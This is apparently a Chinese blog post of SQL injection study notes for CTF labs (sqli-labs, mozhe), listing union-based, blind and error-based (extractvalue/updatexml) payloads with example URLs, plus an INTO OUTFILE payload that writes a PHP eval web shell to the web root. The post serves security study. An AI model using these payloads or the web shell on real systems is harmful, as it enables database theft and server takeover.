sql注入学习笔记

最新推荐文章于 2022-07-26 17:49:04 发布
最新推荐文章于 2022-07-26 17:49:04 发布
阅读量124 收藏 1
点赞数 1
分类专栏: ctf学习总结 学习总结 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43983332/article/details/103172858
版权

基本手注

  • 判断是否有注入如点
  1. and 1=1
  2. and 1=2// 判断是否有注入点
    判断返回字段数目
    1.order by 1
    2.order by 2
    。。。。。

  • 查看当前数据库名,查看版本号
    1.union select 1,database(),version(),4
    例如:
    http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,database(),version(),4

  • 爆数据库名

  1. union select 1,SCHEMA_NAME,3,4 from inforrmation_schema.SCHEMATA limit 0,1
    注:在MySQL数据库中information_schema库中,表SCHEMATA 中在SCHEMA_NAME字段中包含所有数据库名;
    limit 0,1意思是从第0行起,取1行数据
  • 爆表名
    1.union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA = ‘数据库名’
    数据库执行语句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ limit 1,1

注明:information_schema.TABLES 存放着表名

  • 爆破字段名称
    字段名在information_schema库COLUMNS表中,
    表的格式:

    常用的表的字段:
    TABLE_SCHEMA //表所属库
    TABLE_NAME //表名
    COLUMN_NAME //字段名
    COLUMN_TYPE //字段类型

例如:
http://219.153.49.228:48509/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ and TABLE_NAME=‘StormGroup_member’ limit 0,1

  • 爆破字段内容
    查看当前表中有几条数据;
    count()
    例如:http://219.153.49.228:48509/new_list.php?id=1%20and%201=2%20union%20select%201,count(    ),3,4%20from%20mozhe_Discuz_StormGroup.StormGroup_member
    将数据拼接成字符串
    concat()
    例如:union select 1,concat(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

盲注

sqli-labs 第五关为例

所用函数介绍
  • left(a,b) 表示的是从字符表达式最左边一个字符开始返回指定数目的字符.若 b 的值大于 a 的长度,则返回字符表达式的全部字符a.如果 b 为负值或 0,则返回空字符串.
  • right(a,b) 表示的是从字符表达式最右边一个字符开始返回指定数目的字符.若 b 的值大于 a 的长度,则返回字符表达式的全部字符a.如果 b 为负值或 0,则返回空字符串.
  • **substr()**函数 substr(字符串,截取开始位置,截取长度) //返回截取的字
  • **length()**函数 获取当前字符串的长度

基于报错的注入

所用函数
  • extractvalue()
    extractvalue():从目标XML中返回包含所查询值的字符串。
    EXTRACTVALUE (XML_document, XPath_string);
    第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
    第二个参数:XPath_string (Xpath格式的字符串)
    concat:返回结果为连接参数产生的字符串。
    payloaod: and extractvalue(null,concat(0x7e,(select @@datadir),0x7e));

extractvalue注入的原理:依旧如同updatexml一样,extract的第二个参数要求是xpath格式字符串,而我们输入的并不是。所以报错。

  • updatexml()
    payload: select updatexml(1,concat(0x7e,(select user()),0x7e),1)

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200219144858843.gif

写文件注入(需要写文件权限)

payload(所用函数outfile)

  • id=-1’)) union select 1,2,’<?php @eval($_POST["cmd"]); ?>'into outfile"/var/www/html/22.php";%23
Mr.king//
关注
专栏目录
updatexml mysql_MYSQL updatexml报错注入
weixin_42311000的博客
01-19 1044
updatexml()函数updataxml()函数用法UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,Str...
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 578
目录一、sql注入基础二、sql注入union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
SQL Union用法总结
11-10 9439
UNION 运算符将多个 SELECT 语句的结果组合成一个结果集。 (1)使用 UNION 须满足以下条件: A:所有查询中必须具有相同的结构(即查询中的的列数和列的顺序必须相同)。 B:对应列的数据类型可以不同但是必须兼容(所谓的兼容是指两种类型之间可以进行隐式转换,不能进行隐式转换则报错)。也可以用显式转换为相同的数据类型。 (当数据类型不同时,则根据数据类型优先级规则确定所产生的数
sql注入中遇到的入门函数介绍
跳房子的博客
01-21 209
由于之前的博客应付差事,在此做出深刻检讨并进行一些函数说明上的补充(重新做人就在今天-.-) 首先这里先普及三个基本的函数 version()   返回当前数据库的版本 database()  返回当前连接的数据库名 user()  返回当前连接的用户(是当前的用户不是当前的数据表) @@datadir 读取数据库路径 @@basedir MYSQL获取安装路径 然后下面说一些数据库...
mysql 错误回显注入,SQL注入实战篇2--显错注入
weixin_31159999的博客
03-23 265
本次实战靶场用的封神台的SQL注入靶场。看过实战1后,咱们就直接来试试自己有没有学会。因为是靶场,所以肯定存在漏洞,咱们就不判断是否存在注入了。第一步:从页面显示来看,这种应该是一个数字型的回显注入。那么我们就来看看有几列。构造?id=1 and 1=1 group by 1发现页面没有报错,继续往后group by 2和group by 3...,当试到4的时候发现查询不到了,由此判断应该是有三...
墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)
曹振国的博客
06-19 537
联合查询1.查询注入点2.查询字段数3.查询库名4.查询表名5.查询字段6.查询字段的值7.解压status=1的md5登录 1.查询注入点 ?id=tingjigonggao'and 1=1 -- qwe //正常输出 2.查询字段数 ?id=tingjigonggao'and 1=1 order by 4 -- qwe //正常 ?id=tingjigonggao'and 1=1 order by 5 -- qwe //报错 说明是4个字段 3.查询库名 ?id=tingjigonggao
SQL注入学习笔记
Likhaooo的博客
03-26 4042
文章目录sql注入分类联合查询1.order by2.union select联合查询3.获取表:4.获取字段5.获取字段内容 sql注入分类 1.布尔注入 2.联合注入 3.延时注入 4.报错注入 联合查询 1.order by select * from admin where user = 'admin' order by n//查看有几个字段数 2.union select联合查询 select * from admin where user = 'admin' union select vers
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1267
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 576
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
m0_51756263的博客
07-15 4303
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
墨者SQL过滤字符后手工注入漏洞测试(第3题)
wswr的博客
03-18 971
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
MYSQL updatexml报错注入
weixin_30778805的博客
08-20 347
首先了解下updatexml()函数 UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式...
一道综合渗透题引发的updatexml()注入思考
热门推荐
Grey的博客
05-09 1万+
MYSQL数据库updatexml报错注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
Sql盲注学习笔记1
蚁景网安学院
12-25 382
走过路过,不要错过这个公众号哦!本文主要借助一道宽字节的sql注入题说明imformation_schema在sql注入中的运用,然后详细说明imformation_schema配合if...
aws php 上传文件 限制大小_Web安全(一)文件上传漏洞[二]
weixin_39644750的博客
11-03 192
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。后缀名绕过同样选择文件上传漏洞,漏洞难度选择medium中等难度。尝试上传上篇(Web安全(一)文件上传漏洞[一])的的一句话木马文件,可以看到上传失败。将一句话木马的文件后缀名从.php改为.php3,再次上传一句话木马,这时已经成功上传,这就是对文件后缀名的绕过。尝试执行webshell,也是可以成功执行。curl -d "h...
实验吧 加了料的报错注入 再见报错注入
Assassin
01-31 1999
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users
php注射库
FreeXploiT
10-24 1311
php注射库作者:swap类别:漏洞资料库发布日期:2004-06-28 14:45:43总浏览:46 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(9
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值